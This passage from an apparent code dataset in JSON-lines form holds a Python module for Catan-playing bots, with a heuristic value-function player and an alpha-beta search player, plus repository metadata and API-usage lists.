"numpy.zeros_like", "line_number": 906, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 918, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 920, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 925, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 928, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 931, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 933, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 936, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 938, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 944, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 950, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 958, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 961, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 966, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 968, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 972, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 975, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 978, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 981, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 985, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 987, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 991, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 994, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 997, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1000, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1005, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1006, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1011, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1012, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1014, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1017, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1020, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1029, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 1044, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1057, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1057, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1070, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1070, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1086, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1097, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1097, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1125, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1126, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 1126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1128, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1129, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 1129, "usage_type": "name"}, {"api_name": "matplotlib.rcParams.update", "line_number": 1131, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 1131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1134, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1159, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1159, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1166, "usage_type": "name"}, {"api_name": "numpy.tile", "line_number": 1167, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 1167, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1168, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1191, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1196, "usage_type": "call"}, {"api_name": "colors.cmap", "line_number": 1197, "usage_type": "name"}, {"api_name": "colors.cmap_norm", "line_number": 1197, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 1202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1202, "usage_type": "name"}, {"api_name": "ie.reshape", "line_number": 1205, "usage_type": "call"}, {"api_name": "ie.reshape", "line_number": 1207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 1210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1212, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 1215, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1232, "usage_type": "call"}, {"api_name": "heapq.nsmallest", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1252, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1255, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1256, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1261, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1268, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1268, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1275, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 1276, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 1291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1291, "usage_type": "attribute"}, {"api_name": "numpy.cumsum", "line_number": 1293, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 1297, "usage_type": "call"}, {"api_name": "numpy.greater_equal", "line_number": 1297, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1301, "usage_type": "call"}, {"api_name": "numpy.longfloat", "line_number": 1301, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 1303, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1303, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 1326, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 1328, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1328, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 1333, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 1338, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 1341, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 1341, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 1344, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 1348, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1378, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1379, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 1381, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1381, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 1383, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 1383, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1387, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 1388, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 1394, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1394, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1411, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1412, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1414, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.kron", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1429, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1431, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.kron", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1437, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1443, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1468, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1470, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 1470, "usage_type": "call"}, {"api_name": "sklearn.mixture", "line_number": 1470, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1472, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 1481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1489, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1489, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 1490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1491, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 1500, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1507, "usage_type": "call"}, {"api_name": "gempy.loc", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "gempy.drop", "line_number": 1512, "usage_type": "call"}, {"api_name": "gempy.index", "line_number": 1514, "usage_type": "attribute"}, {"api_name": "gempy.to_csv", "line_number": 1522, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1526, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1526, "usage_type": "call"}]}
+{"seq_id": "5616608408", "text": "import time\nimport random\nfrom typing import Any\n\nfrom catanatron.state_functions import (\n get_longest_road_length,\n get_played_dev_cards,\n get_player_buildings,\n player_key,\n player_num_dev_cards,\n player_num_resource_cards,\n)\nfrom catanatron.game import Game\nfrom catanatron.models.player import Player\nfrom catanatron.models.actions import ActionType\nfrom catanatron.models.enums import RESOURCES, BuildingType\nfrom catanatron_gym.features import (\n build_production_features,\n reachability_features,\n resource_hand_features,\n)\nfrom catanatron_experimental.machine_learning.players.tree_search_utils import (\n expand_spectrum,\n)\n\nTRANSLATE_VARIETY = 4 # i.e. each new resource is like 4 production points\n\nDEFAULT_WEIGHTS = {\n # Where to place. Note winning is best at all costs\n \"public_vps\": 3e14,\n \"production\": 1e8,\n \"enemy_production\": -1e8,\n \"num_tiles\": 1,\n # Towards where to expand and when\n \"reachable_production_0\": 0,\n \"reachable_production_1\": 1e4,\n \"buildable_nodes\": 1e3,\n \"longest_road\": 10,\n # Hand, when to hold and when to use.\n \"hand_synergy\": 1e2,\n \"hand_resources\": 1,\n \"discard_penalty\": -5,\n \"hand_devs\": 10,\n \"army_size\": 10.1,\n}\n\n# Change these to play around with new values\nCONTENDER_WEIGHTS = {\n \"public_vps\": 300000000000001.94,\n \"production\": 100000002.04188395,\n \"enemy_production\": -99999998.03389844,\n \"num_tiles\": 2.91440418,\n \"reachable_production_0\": 2.03820085,\n \"reachable_production_1\": 10002.018773150001,\n \"buildable_nodes\": 1001.86278466,\n \"longest_road\": 12.127388499999999,\n \"hand_synergy\": 102.40606877,\n \"hand_resources\": 2.43644327,\n \"discard_penalty\": -3.00141993,\n \"hand_devs\": 10.721669799999999,\n \"army_size\": 12.93844622,\n}\n\n\nclass ValueFunctionPlayer(Player):\n \"\"\"\n Player that selects the move that maximizes a heuristic value function.\n\n For now, the base value function only considers 1 enemy player.\n \"\"\"\n\n def __init__(\n self, color, value_fn_builder_name=None, params=None, is_bot=True, epsilon=None\n ):\n super().__init__(color, is_bot)\n self.value_fn_builder_name = (\n \"contender_fn\" if value_fn_builder_name == \"C\" else \"base_fn\"\n )\n self.params = params\n self.epsilon = epsilon\n\n def decide(self, game, playable_actions):\n if len(playable_actions) == 1:\n return playable_actions[0]\n\n if self.epsilon is not None and random.random() < self.epsilon:\n return random.choice(playable_actions)\n\n best_value = float(\"-inf\")\n best_action = None\n for action in playable_actions:\n game_copy = game.copy()\n game_copy.execute(action)\n\n value_fn = get_value_fn(self.value_fn_builder_name, self.params)\n value = value_fn(game_copy, self.color)\n if value > best_value:\n best_value = value\n best_action = action\n\n return best_action\n\n def __str__(self): \n return super().__str__() + f\"(value_fn={self.value_fn_builder_name})\"\n\n\ndef get_value_fn(name, params, value_function=None):\n if value_function is not None:\n return value_function\n elif name == \"base_fn\":\n return base_fn(DEFAULT_WEIGHTS)\n elif name == \"contender_fn\":\n return contender_fn(params)\n else:\n raise ValueError\n\n\ndef base_fn(params=DEFAULT_WEIGHTS):\n def fn(game, p0_color):\n production_features = build_production_features(True)\n our_production_sample = production_features(game, p0_color)\n enemy_production_sample = production_features(game, p0_color)\n production = value_production(our_production_sample, \"P0\")\n enemy_production = value_production(enemy_production_sample, \"P1\", False)\n\n key = player_key(game.state, p0_color)\n longest_road_length = get_longest_road_length(game.state, p0_color)\n\n reachability_sample = reachability_features(game, p0_color, 2)\n features = [f\"P0_0_ROAD_REACHABLE_{resource}\" for resource in RESOURCES]\n reachable_production_at_zero = sum([reachability_sample[f] for f in features])\n features = [f\"P0_1_ROAD_REACHABLE_{resource}\" for resource in RESOURCES]\n reachable_production_at_one = sum([reachability_sample[f] for f in features])\n\n hand_sample = resource_hand_features(game, p0_color)\n features = [f\"P0_{resource}_IN_HAND\" for resource in RESOURCES]\n distance_to_city = (\n max(2 - hand_sample[\"P0_WHEAT_IN_HAND\"], 0)\n + max(3 - hand_sample[\"P0_ORE_IN_HAND\"], 0)\n ) / 5.0 # 0 means good. 1 means bad.\n distance_to_settlement = (\n max(1 - hand_sample[\"P0_WHEAT_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_SHEEP_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_BRICK_IN_HAND\"], 0)\n + max(1 - hand_sample[\"P0_WOOD_IN_HAND\"], 0)\n ) / 4.0 # 0 means good. 1 means bad.\n hand_synergy = (2 - distance_to_city - distance_to_settlement) / 2\n\n num_in_hand = player_num_resource_cards(game.state, p0_color)\n discard_penalty = params[\"discard_penalty\"] if num_in_hand > 7 else 0\n\n # blockability\n buildings = game.state.buildings_by_color[p0_color]\n owned_nodes = buildings[BuildingType.SETTLEMENT] + buildings[BuildingType.CITY]\n owned_tiles = set()\n for n in owned_nodes:\n owned_tiles.update(game.state.board.map.adjacent_tiles[n])\n num_tiles = len(owned_tiles)\n\n # TODO: Simplify to linear(?)\n num_buildable_nodes = len(game.state.board.buildable_node_ids(p0_color))\n longest_road_factor = (\n params[\"longest_road\"] if num_buildable_nodes == 0 else 0.1\n )\n\n return float(\n game.state.player_state[f\"{key}_VICTORY_POINTS\"] * params[\"public_vps\"]\n + production * params[\"production\"]\n + enemy_production * params[\"enemy_production\"]\n + reachable_production_at_zero * params[\"reachable_production_0\"]\n + reachable_production_at_one * params[\"reachable_production_1\"]\n + hand_synergy * params[\"hand_synergy\"]\n + num_buildable_nodes * params[\"buildable_nodes\"]\n + num_tiles * params[\"num_tiles\"]\n + num_in_hand * params[\"hand_resources\"]\n + discard_penalty\n + longest_road_length * longest_road_factor\n + player_num_dev_cards(game.state, p0_color) * params[\"hand_devs\"]\n + get_played_dev_cards(game.state, p0_color, \"KNIGHT\") * params[\"army_size\"]\n )\n\n return fn\n\n\ndef value_production(sample, player_name=\"P0\", include_variety=True):\n proba_point = 2.778 / 100\n features = [\n f\"EFFECTIVE_{player_name}_WHEAT_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_ORE_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_SHEEP_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_WOOD_PRODUCTION\",\n f\"EFFECTIVE_{player_name}_BRICK_PRODUCTION\",\n ]\n prod_sum = sum([sample[f] for f in features])\n prod_variety = (\n sum([sample[f] != 0 for f in features]) * TRANSLATE_VARIETY * proba_point\n )\n return prod_sum + (0 if not include_variety else prod_variety)\n\n\ndef contender_fn(params):\n return base_fn(params or CONTENDER_WEIGHTS)\n\n\nALPHABETA_DEFAULT_DEPTH = 2\nMAX_SEARCH_TIME_SECS = 20\n\n\nclass AlphaBetaPlayer(Player):\n \"\"\"\n Player that executes an AlphaBeta Search where the value of each node\n is taken to be the expected value (using the probability of rolls, etc...)\n of its children. At leafs we simply use the heuristic function given.\n\n NOTE: More than 3 levels seems to take much longer, it would be\n interesting to see this with prunning.\n \"\"\"\n\n def __init__(\n self,\n color,\n depth=ALPHABETA_DEFAULT_DEPTH,\n prunning=True,\n value_fn_builder_name=None,\n params=DEFAULT_WEIGHTS,\n epsilon=None,\n ):\n super().__init__(color)\n self.depth = int(depth)\n self.prunning = str(prunning).lower() != \"false\"\n self.value_fn_builder_name = (\n \"contender_fn\" if value_fn_builder_name == \"C\" else \"base_fn\"\n )\n self.params = params\n self.use_value_function = None\n self.epsilon = epsilon\n\n def value_function(self, game, p0_color):\n raise NotImplementedError\n\n def get_actions(self, game):\n if self.prunning:\n return list_prunned_actions(game)\n return game.state.playable_actions\n\n def decide(self, game: Game, playable_actions):\n actions = self.get_actions(game)\n if len(actions) == 1:\n return actions[0]\n\n if self.epsilon is not None and random.random() < self.epsilon:\n return random.choice(playable_actions)\n\n start = time.time()\n state_id = str(len(game.state.actions))\n node = DebugStateNode(state_id, self.color) # i think it comes from outside\n deadline = start + MAX_SEARCH_TIME_SECS\n result = self.alphabeta(\n game.copy(), self.depth, float(\"-inf\"), float(\"inf\"), deadline, node\n )\n # print(\"Decision Results:\", self.depth, len(actions), time.time() - start)\n # if game.state.num_turns > 10:\n # render_debug_tree(node)\n # breakpoint()\n return result[0]\n\n def __repr__(self) -> str:\n return (\n super().__repr__()\n + f\"(depth={self.depth},value_fn={self.value_fn_builder_name},prunning={self.prunning})\"\n )\n\n def alphabeta(self, game, depth, alpha, beta, deadline, node):\n \"\"\"AlphaBeta MiniMax Algorithm.\n\n NOTE: Sometimes returns a value, sometimes an (action, value). This is\n because some levels are state=>action, some are action=>state and in\n action=>state would probably need (action, proba, value) as return type.\n\n {'value', 'action'|None if leaf, 'node' }\n \"\"\"\n if depth == 0 or game.winning_color() is not None or time.time() >= deadline:\n value_fn = get_value_fn(\n self.value_fn_builder_name,\n self.params,\n self.value_function if self.use_value_function else None,\n )\n value = value_fn(game, self.color)\n\n node.expected_value = value\n return None, value\n\n maximizingPlayer = game.state.current_color() == self.color\n actions = self.get_actions(game) # list of actions.\n action_outcomes = expand_spectrum(game, actions) # action => (game, proba)[]\n\n if maximizingPlayer:\n #print(\"JEAH\")\n\n best_action = None\n best_value = float(\"-inf\")\n for i, (action, outcomes) in enumerate(action_outcomes.items()):\n action_node = DebugActionNode(action)\n\n expected_value = 0\n for j, (outcome, proba) in enumerate(outcomes):\n out_node = DebugStateNode(\n f\"{node.label} {i} {j}\", outcome.state.current_color()\n )\n\n result = self.alphabeta(\n outcome, depth - 1, alpha, beta, deadline, out_node\n )\n value = result[1]\n expected_value += proba * value\n\n action_node.children.append(out_node)\n action_node.probas.append(proba)\n\n action_node.expected_value = expected_value\n node.children.append(action_node)\n\n if expected_value > best_value:\n best_action = action\n best_value = expected_value\n alpha = max(alpha, best_value)\n if alpha >= beta:\n break # beta cutoff\n\n node.expected_value = best_value\n return best_action, best_value\n else:\n #print(\"NOT\")\n best_action = None\n best_value = float(\"inf\")\n for i, (action, outcomes) in enumerate(action_outcomes.items()):\n action_node = DebugActionNode(action)\n\n expected_value = 0\n for j, (outcome, proba) in enumerate(outcomes):\n out_node = DebugStateNode(\n f\"{node.label} {i} {j}\", outcome.state.current_color()\n )\n\n result = self.alphabeta(\n outcome, depth - 1, alpha, beta, deadline, out_node\n )\n value = result[1]\n expected_value += proba * value\n\n action_node.children.append(out_node)\n action_node.probas.append(proba)\n\n action_node.expected_value = expected_value\n node.children.append(action_node)\n\n if expected_value < best_value:\n best_action = action\n best_value = expected_value\n beta = min(beta, best_value)\n if beta <= alpha:\n break # alpha cutoff\n\n node.expected_value = best_value\n return best_action, best_value\n\n\nclass DebugStateNode:\n def __init__(self, label, color):\n self.label = label\n self.children = [] # DebugActionNode[]\n self.expected_value = None\n self.color = color\n\n\nclass DebugActionNode:\n def __init__(self, action):\n self.action = action\n self.expected_value: Any = None\n self.children = [] # DebugStateNode[]\n self.probas = []\n\n\ndef render_debug_tree(node):\n from graphviz import Digraph\n\n dot = Digraph(\"AlphaBetaSearch\")\n\n agenda = [node]\n\n while len(agenda) != 0:\n tmp = agenda.pop()\n dot.node(\n tmp.label,\n label=f\"<{tmp.label}{tmp.expected_value} >\",\n style=\"filled\",\n fillcolor=tmp.color.value,\n )\n for child in tmp.children:\n action_label = (\n f\"{tmp.label} - {str(child.action).replace('<', '').replace('>', '')}\"\n )\n dot.node(\n action_label,\n label=f\"<{action_label}{child.expected_value} >\",\n shape=\"box\",\n )\n dot.edge(tmp.label, action_label)\n for action_child, proba in zip(child.children, child.probas):\n dot.node(\n action_child.label,\n label=f\"<{action_child.label}{action_child.expected_value} >\",\n )\n dot.edge(action_label, action_child.label, label=str(proba))\n agenda.append(action_child)\n print(dot.render())\n\n\ndef list_prunned_actions(game):\n current_color = game.state.current_color()\n playable_actions = game.state.playable_actions\n actions = playable_actions.copy()\n types = set(map(lambda a: a.action_type, playable_actions))\n\n # Prune Initial Settlements at 1-tile places\n if ActionType.BUILD_SETTLEMENT in types and game.state.is_initial_build_phase:\n actions = filter(\n lambda a: len(game.state.board.map.adjacent_tiles[a.value]) != 1, actions\n )\n\n # Prune Trading if can hold for resources. Only for rare resources.\n if ActionType.MARITIME_TRADE in types:\n port_resources = game.state.board.get_player_port_resources(current_color)\n has_three_to_one = None in port_resources\n # TODO: for 2:1 ports, skip any 3:1 or 4:1 trades\n # TODO: if can_safely_hold, prune all\n tmp_actions = []\n for action in actions:\n if action.action_type != ActionType.MARITIME_TRADE:\n tmp_actions.append(action)\n continue\n # has 3:1, skip any 4:1 trades\n if has_three_to_one and action.value[3] is not None:\n continue\n tmp_actions.append(action)\n actions = tmp_actions\n\n if ActionType.MOVE_ROBBER in types:\n actions = prune_robber_actions(current_color, game, actions)\n\n return list(actions)\n\n\ndef prune_robber_actions(current_color, game, actions):\n \"\"\"Eliminate all but the most impactful tile\"\"\"\n enemy_color = next(filter(lambda c: c != current_color, game.state.colors))\n enemy_owned_tiles = set()\n for node_id in get_player_buildings(\n game.state, enemy_color, BuildingType.SETTLEMENT\n ):\n enemy_owned_tiles.update(game.state.board.map.adjacent_tiles[node_id])\n for node_id in get_player_buildings(game.state, enemy_color, BuildingType.CITY):\n enemy_owned_tiles.update(game.state.board.map.adjacent_tiles[node_id])\n\n robber_moves = set(\n filter(\n lambda a: a.action_type == ActionType.MOVE_ROBBER\n and game.state.board.map.tiles[a.value[0]] in enemy_owned_tiles,\n actions,\n )\n )\n\n production_features = build_production_features(True)\n\n def impact(action):\n game_copy = game.copy()\n game_copy.execute(action)\n\n our_production_sample = production_features(game_copy, current_color)\n enemy_production_sample = production_features(game_copy, current_color)\n production = value_production(our_production_sample, \"P0\")\n enemy_production = value_production(enemy_production_sample, \"P1\")\n\n return enemy_production - production\n\n most_impactful_robber_action = max(\n robber_moves, key=impact\n ) # most production and variety producing\n actions = filter(\n # lambda a: a.action_type != action_type or a == most_impactful_robber_action,\n lambda a: a.action_type != ActionType.MOVE_ROBBER or a in robber_moves,\n actions,\n )\n return actions\n", "repo_name": "nomah98/catan-project", "sub_path": "catanatron_experimental/catanatron_experimental/machine_learning/players/minimax.py", "file_name": "minimax.py", "file_ext": "py", "file_size_in_byte": 17833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "catanatron.models.player.Player", "line_number": 65, "usage_type": "name"}, {"api_name": "random.random", "line_number": 86, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 87, "usage_type": "call"}, {"api_name": "catanatron_gym.features.build_production_features", "line_number": 120, "usage_type": "call"}, {"api_name": "catanatron.state_functions.player_key", "line_number": 126, "usage_type": "call"}, {"api_name": "catanatron.state_functions.get_longest_road_length", "line_number": 127, "usage_type": "call"}, {"api_name": "catanatron_gym.features.reachability_features", "line_number": 129, "usage_type": "call"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 130, "usage_type": "name"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 132, "usage_type": "name"}, {"api_name": "catanatron_gym.features.resource_hand_features", "line_number": 135, "usage_type": "call"}, {"api_name": "catanatron.models.enums.RESOURCES", "line_number": 136, "usage_type": "name"}, {"api_name": "catanatron.state_functions.player_num_resource_cards", "line_number": 149, "usage_type": "call"}, {"api_name": "catanatron.models.enums.BuildingType.SETTLEMENT", "line_number": 154, "usage_type": "attribute"}, {"api_name": "catanatron.models.enums.BuildingType", "line_number": 154, "usage_type": "name"}, {"api_name": "catanatron.models.enums.BuildingType.CITY", "line_number": 154, "usage_type": "attribute"}, {"api_name": "catanatron.state_functions.player_num_dev_cards", "line_number": 178, "usage_type": "call"}, {"api_name": "catanatron.state_functions.get_played_dev_cards", "line_number": 179, "usage_type": "call"}, {"api_name": "catanatron.models.player.Player", "line_number": 209, "usage_type": "name"}, {"api_name": "catanatron.game.Game", "line_number": 246, "usage_type": "name"}, {"api_name": "random.random", "line_number": 251, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 252, "usage_type": "call"}, {"api_name": "time.time", "line_number": 254, "usage_type": "call"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "catanatron_experimental.machine_learning.players.tree_search_utils.expand_spectrum", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 379, "usage_type": "name"}, {"api_name": "graphviz.Digraph", "line_number": 387, "usage_type": "call"}, {"api_name": "catanatron.models.actions.ActionType.BUILD_SETTLEMENT", "line_number": 426, "usage_type": "attribute"}, {"api_name": "catanatron.models.actions.ActionType", "line_number": 426, "usage_type": "name"}, {"api_name": "catanatron.models.actions.ActionType.MARITIME_TRADE", "line_number": 432, "usage_type": "attribute"}, 